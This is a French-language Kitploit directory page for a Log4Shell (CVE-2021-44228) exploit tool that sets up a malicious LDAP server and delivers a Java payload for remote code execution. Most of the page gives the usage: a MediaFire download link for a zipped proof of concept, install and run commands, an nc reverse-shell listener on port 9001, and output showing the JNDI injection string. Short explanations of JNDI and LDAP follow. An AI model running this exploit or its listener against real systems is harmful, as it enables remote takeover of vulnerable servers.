Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4j-Exploit-CVE-2021-44228 — Outil d'exploitation pour CVE-2021-44228 (Log4Shell) qui configure un serveur LDAP malveillant et livre une charge utile Java pour réaliser une exécution de code à distance sur des applications Log4j vulnérables. | Kitploit
Outils/GitHubGitHub/willian-2-0-0-1/log4j-exploit-cve-2021-44228
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubwillian-2-0-0-1/log4j-exploit-cve-2021-44228

Log4j-Exploit-CVE-2021-44228

Outil d'exploitation pour CVE-2021-44228 (Log4Shell) qui configure un serveur LDAP malveillant et livre une charge utile Java pour réaliser une exécution de code à distance sur des applications Log4j vulnérables.

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4j-Exploit-CVE-2021-44228

Outil de test de vulnérabilité Log4Shell https://log4shell.tools/

Exploit avec Java déjà inclus, pour éviter de créer un compte, etc..

root@kitploit:~
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
root@kitploit:~
nc -lvnp 9001
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Concepts de base de log4j

Qu'est-ce que JNDI

C'est une interface Java API pour un service d'annuaire qui permet aux clients logiciels Java de découvrir et de rechercher des données et des ressources via un nom

Qu'est-ce que LDAP

C'est un protocole d'accès à l'annuaire. LDAP peut être utilisé pour valider les noms d'utilisateur et mots de passe avec les serveurs Docker, Jenkins, Kubernetes, Open VPN et Linux Samba. L'authentification unique LDAP peut également être utilisée par les administrateurs système pour contrôler l'accès à une base de données LDAP.

POUR CEUX QUI VEULENT EN SAVOIR PLUS SUR LA VULNÉRABILITÉ, VOICI LA DOC CI-DESSOUS:

https://www.lunasec.io/docs/blog/log4j-zero-day/

EXPLOIT SANS JAVA INCLUS

https://github.com/kozmer/log4j-shell-poc
Télécharger l’outil